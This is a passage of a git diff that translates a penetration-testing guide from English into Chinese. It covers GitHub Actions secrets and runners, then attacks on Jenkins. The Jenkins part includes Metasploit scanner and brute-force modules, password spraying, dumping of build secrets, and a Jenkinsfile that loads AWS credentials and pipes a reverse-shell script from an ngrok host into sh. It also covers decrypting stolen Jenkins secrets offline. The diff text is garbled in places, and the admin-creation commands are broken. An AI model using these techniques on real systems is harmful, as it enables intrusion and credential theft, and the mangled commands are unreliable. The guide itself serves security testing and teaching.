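# Registered self-hosted runners (requires org admin permissions)
gh api /orgs/<ORG>/actions/runners
```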
+可以完全禁止使用 GitHub Actions,**允许所有 GitHub Actions**,或仅允许某些操作。 -It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run. +还可以配置 **谁需要批准才能运行 GitHub Action** 以及运行时 GitHub Action 的 **GITHUB_TOKEN 权限**。 -### Git Secrets +### Git 秘密 -Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**. - -These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like: +GitHub Action 通常需要某种秘密与 GitHub 或第三方应用程序进行交互。为了 **避免将它们以明文形式放入代码库**,GitHub 允许将它们作为 **秘密** 放置。 +这些秘密可以为 **代码库或整个组织** 配置。然后,为了使 **Action 能够访问秘密**,您需要将其声明为: ```yaml steps: - - name: Hello world action - with: # Set the secret as an input - super_secret:${{ secrets.SuperSecret }} - env: # Or as an environment variable - super_secret:${{ secrets.SuperSecret }} +- name: Hello world action +with: # Set the secret as an input +super_secret:${{ secrets.SuperSecret }} +env: # Or as an environment variable +super_secret:${{ secrets.SuperSecret }} ``` - -#### Example using Bash - +#### 使用 Bash 的示例 ```yaml steps: - - shell: bash - env: SUPER_SECRET:${{ secrets.SuperSecret }} - run: | - example-command "$SUPER_SECRET" +- shell: bash +env: SUPER_SECRET:${{ secrets.SuperSecret }} +run: | +example-command "$SUPER_SECRET" ``` - > [!WARNING] -> Secrets **can only be accessed from the Github Actions** that have them declared. +> Secrets **只能通过声明它们的 Github Actions 访问**。 -> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**. +> 一旦在仓库或组织中配置,**github 用户将无法再次访问它们**,他们只能**更改它们**。 -Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action). +因此,**窃取 github secrets 的唯一方法是能够访问执行 Github Action 的机器**(在这种情况下,您将只能访问为该 Action 声明的 secrets)。 -### Git Environments - -Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like: +### Git 环境 +Github 允许创建 **环境**,您可以在其中保存 **secrets**。然后,您可以通过类似以下方式授予 github action 访问环境中的 secrets: ```yaml jobs: - deployment: - runs-on: ubuntu-latest - environment: env_name +deployment: +runs-on: ubuntu-latest +environment: env_name ``` - -You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\ -It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed. +您可以配置一个环境以**被所有分支访问**(默认),**仅受保护的**分支或**指定**可以访问它的分支。\ +它还可以设置**执行**某个**操作**之前所需的**审核数量**,或者**等待**一段**时间**再允许部署继续。 ### Git Action Runner -A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. +Github Action可以**在github环境中执行**,也可以在用户配置的**第三方基础设施**中执行。 -Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**. 
+一些组织将允许在**第三方基础设施**中运行Github Actions,因为这通常是**更便宜**的。 -You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_ +您可以在 _https://github.com/organizations/\/settings/actions/runners_ 列出组织的自托管运行器。 -The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml. +查找**在非github基础设施中执行的Github Actions**的方法是搜索Github Action配置yaml中的 `runs-on: self-hosted`。 -It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs. +**不可能在不同组织的自托管环境中运行组织的Github Action**,因为**在配置Runner时会生成一个唯一的令牌**以知道该Runner属于哪里。 -If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with. +如果自定义**Github Runner配置在AWS或GCP内部的机器上**,例如,该Action**可能会访问元数据端点**并**窃取服务帐户的令牌**,该机器正在运行。 ### Git Action Compromise -If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed. +如果允许所有操作(或恶意操作),用户可能会使用一个**恶意的Github Action**,这将**危害**正在执行的**容器**。 > [!CAUTION] -> A **malicious Github Action** run could be **abused** by the attacker to: +> 一个**恶意的Github Action**运行可能会被攻击者**滥用**: > -> - **Steal all the secrets** the Action has access to -> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service) -> - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. +> - **窃取所有秘密**,该Action可以访问 +> - **横向移动**,如果该Action在**第三方基础设施**中执行,可以访问用于运行机器的SA令牌(可能通过元数据服务) +> - **滥用工作流**使用的令牌,以**窃取执行该Action的repo的代码**或**甚至修改它**。 ## Branch Protections -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. +分支保护旨在**不将完整控制权授予用户**。目标是**在能够在某个分支中编写代码之前设置多个保护方法**。 -The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_ +**一个仓库的分支保护**可以在 _https://github.com/\/\/settings/branches_ 找到。 > [!NOTE] -> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. +> **不可能在组织级别设置分支保护**。因此,所有保护必须在每个repo中声明。 -Different protections can be applied to a branch (like to master): +可以对分支应用不同的保护(例如对master): -- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: - - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. - - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. - - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) - - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. 
- - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. -- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). -- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. -- **Require signed commits**. The commits need to be signed. -- **Require linear history.** Prevent merge commits from being pushed to matching branches. -- **Include administrators**. If this isn't set, admins can bypass the restrictions. -- **Restrict who can push to matching branches**. Restrict who can send a PR. +- 您可以**要求在合并之前进行PR**(因此您不能直接在分支上合并代码)。如果选择此项,则可以实施其他不同的保护: +- **要求一定数量的批准**。通常需要1或2个以上的人批准您的PR,以便单个用户无法直接合并代码。 +- **在推送新提交时撤销批准**。否则,用户可能会批准合法代码,然后用户可以添加恶意代码并合并。 +- **要求代码所有者进行审核**。至少需要1个代码所有者批准PR(因此“随机”用户无法批准)。 +- **限制谁可以撤销拉取请求审核**。您可以指定允许撤销拉取请求审核的人员或团队。 +- **允许指定的参与者绕过拉取请求要求**。这些用户将能够绕过先前的限制。 +- **要求状态检查在合并之前通过**。某些检查需要在能够合并提交之前通过(例如,检查没有明文秘密的github action)。 +- **要求在合并之前解决对话**。所有代码上的评论需要在PR合并之前解决。 +- **要求签名提交**。提交需要签名。 +- **要求线性历史**。防止将合并提交推送到匹配的分支。 +- **包括管理员**。如果未设置此项,管理员可以绕过限制。 +- **限制谁可以推送到匹配的分支**。限制谁可以发送PR。 > [!NOTE] -> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +> 如您所见,即使您设法获得某个用户的凭据,**repos可能受到保护,避免您将代码推送到master**,例如,以危害CI/CD管道。 ## References @@ -253,7 +246,3 @@ Different protections can be applied to a branch (like to master): - [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md index 4dfba3ff3..0145b1df9 100644 --- a/src/pentesting-ci-cd/jenkins-security/README.md +++ b/src/pentesting-ci-cd/jenkins-security/README.md @@ -2,311 +2,291 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually. 
+Jenkins 是一个工具,提供了一种简单的方法来建立几乎 **任何** 编程语言和源代码库组合的 **持续集成** 或 **持续交付** (CI/CD) 环境,使用管道。此外,它还自动化了各种常规开发任务。虽然 Jenkins 并不消除 **为单个步骤创建脚本的需要**,但它确实提供了一种比手动构建更快、更强大的方式来集成整个构建、测试和部署工具的序列。 {{#ref}} basic-jenkins-information.md {{#endref}} -## Unauthenticated Enumeration - -In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use: +## 未经身份验证的枚举 +为了在没有身份验证的情况下搜索有趣的 Jenkins 页面,如 (_/people_ 或 _/asynchPeople_,这列出了当前用户),您可以使用: ``` msf> use auxiliary/scanner/http/jenkins_enum ``` - -Check if you can execute commands without needing authentication: - +检查您是否可以在不需要身份验证的情况下执行命令: ``` msf> use auxiliary/scanner/http/jenkins_command ``` +在没有凭据的情况下,您可以查看 _**/asynchPeople/**_ 路径或 _**/securityRealm/user/admin/search/index?q=**_ 以获取 **用户名**。 -Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**. - -You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_ +您可能能够从路径 _**/oops**_ 或 _**/error**_ 获取 Jenkins 版本。 ![](<../../images/image (146).png>) -### Known Vulnerabilities +### 已知漏洞 {{#ref}} https://github.com/gquere/pwn_jenkins {{#endref}} -## Login +## 登录 -In the basic information you can check **all the ways to login inside Jenkins**: +在基本信息中,您可以检查 **所有登录 Jenkins 的方式**: {{#ref}} basic-jenkins-information.md {{#endref}} -### Register +### 注册 -You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.** +您将能够找到 **允许您创建帐户并登录的 Jenkins 实例。就这么简单。** -### **SSO Login** +### **SSO 登录** -Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). +如果存在 **SSO** **功能**/**插件**,那么您应该尝试使用测试帐户(即测试 **Github/Bitbucket 帐户**)登录应用程序。从 [**这里**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/) 获取技巧。 -### Bruteforce - -**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**. +### 暴力破解 +**Jenkins** 缺乏 **密码策略** 和 **用户名暴力破解缓解**。对用户进行 **暴力破解** 是至关重要的,因为可能使用 **弱密码** 或 **用户名作为密码**,甚至 **反向用户名作为密码**。 ``` msf> use auxiliary/scanner/http/jenkins_login ``` +### 密码喷洒 -### Password spraying +使用 [这个 python 脚本](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) 或 [这个 powershell 脚本](https://github.com/chryzsh/JenkinsPasswordSpray)。 -Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray). +### IP 白名单绕过 -### IP Whitelisting Bypass +许多组织将 **基于 SaaS 的源代码管理 (SCM) 系统**(如 GitHub 或 GitLab)与 **内部自托管的 CI** 解决方案(如 Jenkins 或 TeamCity)结合使用。此设置允许 CI 系统 **接收来自 SaaS 源代码控制供应商的 webhook 事件**,主要用于触发管道作业。 -Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs. 
+为了实现这一点,组织 **将 SCM 平台的 IP 范围列入白名单**,允许它们通过 **webhooks** 访问 **内部 CI 系统**。然而,重要的是要注意,**任何人**都可以在 GitHub 或 GitLab 上创建一个 **账户** 并将其配置为 **触发 webhook**,可能会向 **内部 CI 系统** 发送请求。 -To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**. +检查: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/) -Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/) +## 内部 Jenkins 滥用 -## Internal Jenkins Abuses - -In these scenarios we are going to suppose you have a valid account to access Jenkins. +在这些场景中,我们假设您有一个有效的账户来访问 Jenkins。 > [!WARNING] -> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.** +> 根据在 Jenkins 中配置的 **授权** 机制和被攻陷用户的权限,您 **可能能够或无法执行以下攻击**。 -For more information check the basic information: +有关更多信息,请查看基本信息: {{#ref}} basic-jenkins-information.md {{#endref}} -### Listing users +### 列出用户 -If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) +如果您已访问 Jenkins,您可以在 [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) 列出其他注册用户。 -### Dumping builds to find cleartext secrets - -Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets. +### 转储构建以查找明文秘密 +使用 [这个脚本](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) 转储构建控制台输出和构建环境变量,以希望找到明文秘密。 ```bash python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps cd build_dumps gitleaks detect --no-git -v ``` +### **窃取 SSH 凭证** -### **Stealing SSH Credentials** - -If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key: +如果被攻陷的用户具有 **足够的权限来创建/修改新的 Jenkins 节点**,并且 SSH 凭证已经存储以访问其他节点,他可以通过创建/修改一个节点并 **设置一个将记录凭证的主机** 而不验证主机密钥来 **窃取这些凭证**: ![](<../../images/image (218).png>) -You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets). +您通常可以在 **全局提供者** (`/credentials/`) 中找到 Jenkins ssh 凭证,因此您也可以像转储任何其他秘密一样转储它们。更多信息请参见 [**转储秘密部分**](./#dumping-secrets)。 -### **RCE in Jenkins** +### **Jenkins 中的 RCE** -Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**. 
+在 Jenkins 服务器上获得 **shell** 使攻击者有机会泄露所有 **秘密** 和 **环境变量**,并 **利用同一网络中的其他机器**,甚至 **收集云凭证**。 -By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**. +默认情况下,Jenkins 将 **以 SYSTEM 身份运行**。因此,攻陷它将使攻击者获得 **SYSTEM 权限**。 -### **RCE Creating/Modifying a project** +### **创建/修改项目的 RCE** -Creating/Modifying a project is a way to obtain RCE over the Jenkins server: +创建/修改项目是获得 Jenkins 服务器 RCE 的一种方式: {{#ref}} jenkins-rce-creating-modifying-project.md {{#endref}} -### **RCE Execute Groovy script** +### **执行 Groovy 脚本的 RCE** -You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project: +您还可以通过执行 Groovy 脚本来获得 RCE,这可能比创建新项目更隐蔽: {{#ref}} jenkins-rce-with-groovy-script.md {{#endref}} -### RCE Creating/Modifying Pipeline +### 创建/修改管道的 RCE -You can also get **RCE by creating/modifying a pipeline**: +您还可以通过 **创建/修改管道** 来获得 **RCE**: {{#ref}} jenkins-rce-creating-modifying-pipeline.md {{#endref}} -## Pipeline Exploitation +## 管道利用 -To exploit pipelines you still need to have access to Jenkins. +要利用管道,您仍然需要访问 Jenkins。 -### Build Pipelines +### 构建管道 -**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used: +**管道** 也可以用作 **项目中的构建机制**,在这种情况下,可以配置一个 **存储库中的文件**,该文件将包含管道语法。默认使用 `/Jenkinsfile`: ![](<../../images/image (127).png>) -It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access. +还可以 **将管道配置文件存储在其他地方**(例如在其他存储库中),目的是 **分离** 存储库 **访问** 和管道访问。 -If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\ -It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not). +如果攻击者对该文件具有 **写入访问权限**,他将能够 **修改** 它并 **可能触发** 管道,而无需访问 Jenkins。\ +攻击者可能需要 **绕过一些分支保护**(根据平台和用户权限,这些保护可能会被绕过或不被绕过)。 -The most common triggers to execute a custom pipeline are: +执行自定义管道的最常见触发器是: -- **Pull request** to the main branch (or potentially to other branches) -- **Push to the main branch** (or potentially to other branches) -- **Update the main branch** and wait until it's executed somehow +- **向主分支的拉取请求**(或可能是其他分支) +- **推送到主分支**(或可能是其他分支) +- **更新主分支** 并等待以某种方式执行 > [!NOTE] -> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**. +> 如果您是 **外部用户**,您不应该期望创建 **PR 到其他用户/组织的主分支** 并 **触发管道**... 但如果配置 **不当**,您可能会通过利用这一点完全 **攻陷公司**。 -### Pipeline RCE +### 管道 RCE -In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline). +在前面的 RCE 部分中,已经指明了一种技术来 [**通过修改管道获取 RCE**](./#rce-creating-modifying-pipeline)。 -### Checking Env variables - -It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. 
This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles: +### 检查环境变量 +可以为整个管道或特定阶段声明 **明文环境变量**。这些环境变量 **不应包含敏感信息**,但攻击者始终可以 **检查所有管道** 配置/Jenkinsfiles: ```bash pipeline { - agent {label 'built-in'} - environment { - GENERIC_ENV_VAR = "Test pipeline ENV variables." - } +agent {label 'built-in'} +environment { +GENERIC_ENV_VAR = "Test pipeline ENV variables." +} - stages { - stage("Build") { - environment { - STAGE_ENV_VAR = "Test stage ENV variables." - } - steps { +stages { +stage("Build") { +environment { +STAGE_ENV_VAR = "Test stage ENV variables." +} +steps { ``` - ### Dumping secrets -For information about how are secrets usually treated by Jenkins check out the basic information: +有关Jenkins通常如何处理秘密的信息,请查看基本信息: {{#ref}} basic-jenkins-information.md {{#endref}} -Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines. - -There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**: +凭据可以**作用于全局提供者**(`/credentials/`)或**特定项目**(`/job//configure`)。因此,为了提取所有凭据,您需要**至少妥协所有包含秘密的项目**并执行自定义/被污染的管道。 +还有另一个问题,为了在管道的**环境中获取一个秘密**,您需要**知道秘密的名称和类型**。例如,如果您尝试将一个**`usernamePassword`** **秘密**作为**`string`** **秘密**加载,您将收到此**错误**: ``` ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected ``` - -Here you have the way to load some common secret types: - +这里是加载一些常见秘密类型的方法: ```bash withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) { - sh ''' - env #Search for USERNAME and PASS - ''' +sh ''' +env #Search for USERNAME and PASS +''' } withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) { - sh ''' - env #Search for SECRET - ''' +sh ''' +env #Search for SECRET +''' } withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) { - sh ''' - env # Search for USERPASS - ''' +sh ''' +env # Search for USERPASS +''' } # You can also load multiple env variables at once withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), - string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { - sh ''' - env - ''' +string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { +sh ''' +env +''' } ``` - -At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/) +在本页面的末尾,您可以**找到所有凭证类型**:[https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/) > [!WARNING] -> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\ -> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation). 
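Since `withCredentials` needs the exact credential ID and type, it can help to enumerate what exists before poisoning a pipeline. A hedged sketch against the credentials plugin's JSON API — the path and returned fields can vary with the Jenkins and plugin versions:

```bash
# List credential IDs and their types from the global (system) store
curl -s -u <USER>:<API_TOKEN> \
  'http://<JENKINS>/credentials/store/system/domain/_/api/json?tree=credentials[id,typeName]'
```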
+> **一次性转储所有秘密**的最佳方法是**妥协****Jenkins**机器(例如在**内置节点**中运行反向 shell),然后**泄露****主密钥**和**加密秘密**并离线解密它们。\ +> 有关如何执行此操作的更多信息,请参见[节点和代理部分](./#nodes-and-agents)和[后期利用部分](./#post-exploitation)。 -### Triggers +### 触发器 -From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`. - -Cron example: +来自[文档](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers):`triggers`指令定义了**管道应重新触发的自动方式**。对于与 GitHub 或 BitBucket 等源集成的管道,`triggers`可能不是必需的,因为基于 webhook 的集成可能已经存在。当前可用的触发器有`cron`、`pollSCM`和`upstream`。 +Cron 示例: ```bash triggers { cron('H */4 * * 1-5') } ``` +检查 **文档中的其他示例**。 -Check **other examples in the docs**. +### 节点与代理 -### Nodes & Agents +一个 **Jenkins 实例** 可能在 **不同的机器上运行不同的代理**。从攻击者的角度来看,访问不同的机器意味着 **不同的潜在云凭证** 可以被窃取或 **不同的网络访问** 可能被滥用以利用其他机器。 -A **Jenkins instance** might have **different agents running in different machines**. From an attacker perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abuse to exploit other machines. - -For more information check the basic information: +有关更多信息,请查看基本信息: {{#ref}} basic-jenkins-information.md {{#endref}} -You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more: +您可以在 `/computer/` 中枚举 **配置的节点**,通常会找到 **`内置节点`**(即运行 Jenkins 的节点)以及可能更多的节点: ![](<../../images/image (249).png>) -It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information. - -To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config: +**攻陷内置节点** 特别有趣,因为它包含敏感的 Jenkins 信息。 +要指示您想在 **内置 Jenkins 节点** 中 **运行** **管道**,您可以在管道中指定以下配置: ```bash pipeline { - agent {label 'built-in'} +agent {label 'built-in'} ``` +### 完整示例 -### Complete example - -Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell: - +在特定代理中的管道,带有 cron 触发器,具有管道和阶段环境变量,在一个步骤中加载 2 个变量并发送反向 shell: ```bash pipeline { - agent {label 'built-in'} - triggers { cron('H */4 * * 1-5') } - environment { - GENERIC_ENV_VAR = "Test pipeline ENV variables." - } +agent {label 'built-in'} +triggers { cron('H */4 * * 1-5') } +environment { +GENERIC_ENV_VAR = "Test pipeline ENV variables." +} - stages { - stage("Build") { - environment { - STAGE_ENV_VAR = "Test stage ENV variables." - } - steps { - withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), - string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS - ''' - } - } - } +stages { +stage("Build") { +environment { +STAGE_ENV_VAR = "Test stage ENV variables." 
+} +steps { +withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), +string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { +sh ''' +curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS +''' +} +} +} - post { - always { - cleanWs() - } - } +post { +always { +cleanWs() +} +} } ``` - -## Arbitrary File Read to RCE +## 任意文件读取到 RCE {{#ref}} jenkins-arbitrary-file-read-to-rce-via-remember-me.md @@ -326,19 +306,17 @@ jenkins-rce-creating-modifying-project.md jenkins-rce-creating-modifying-pipeline.md {{#endref}} -## Post Exploitation +## 后期利用 ### Metasploit - ``` msf> post/multi/gather/jenkins_gather ``` - ### Jenkins Secrets -You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**. +您可以通过访问 `/credentials/` 列出秘密,如果您拥有足够的权限。请注意,这只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能还有 **更多凭据**。 -If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**. +如果您可以 **查看每个项目的配置**,您也可以在其中看到用于访问存储库的 **凭据名称(秘密)** 和 **项目的其他凭据**。 ![](<../../images/image (180).png>) @@ -350,19 +328,18 @@ jenkins-dumping-secrets-from-groovy.md #### From disk -These files are needed to **decrypt Jenkins secrets**: +这些文件用于 **解密 Jenkins 秘密**: - secrets/master.key - secrets/hudson.util.Secret -Such **secrets can usually be found in**: +这样的 **秘密通常可以在**: - credentials.xml - jobs/.../build.xml - jobs/.../config.xml -Here's a regex to find them: - +这是一个用于查找它们的正则表达式: ```bash # Find the secrets grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" @@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" # Secret example credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==} ``` +#### 离线解密Jenkins秘密 -#### Decrypt Jenkins secrets offline - -If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**. - +如果您已经转储了 **解密秘密所需的密码**,请使用 [**这个脚本**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **来解密这些秘密**。 ```bash python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml 06165DF2-C047-4402-8CAB-1C8EC526C115 @@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT ``` - -#### Decrypt Jenkins secrets from Groovy - +#### 从 Groovy 解密 Jenkins 秘密 ```bash println(hudson.util.Secret.decrypt("{...}")) ``` +### 创建新管理员用户 -### Create new admin user +1. 访问 Jenkins config.xml 文件在 `/var/lib/jenkins/config.xml` 或 `C:\Program Files (x86)\Jenkins\` +2. 搜索词 `true` 并将 **`true`** 改为 **`false`**。 +1. `sed -i -e 's/truefalsetrue` 再次 **启用** **安全性**,并 **再次重启 Jenkins**。 -1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\` -2. Search for the word `true`and change the word \*\*`true` \*\* to **`false`**. - 1. `sed -i -e 's/truefalsetrue` and **restart the Jenkins again**. 
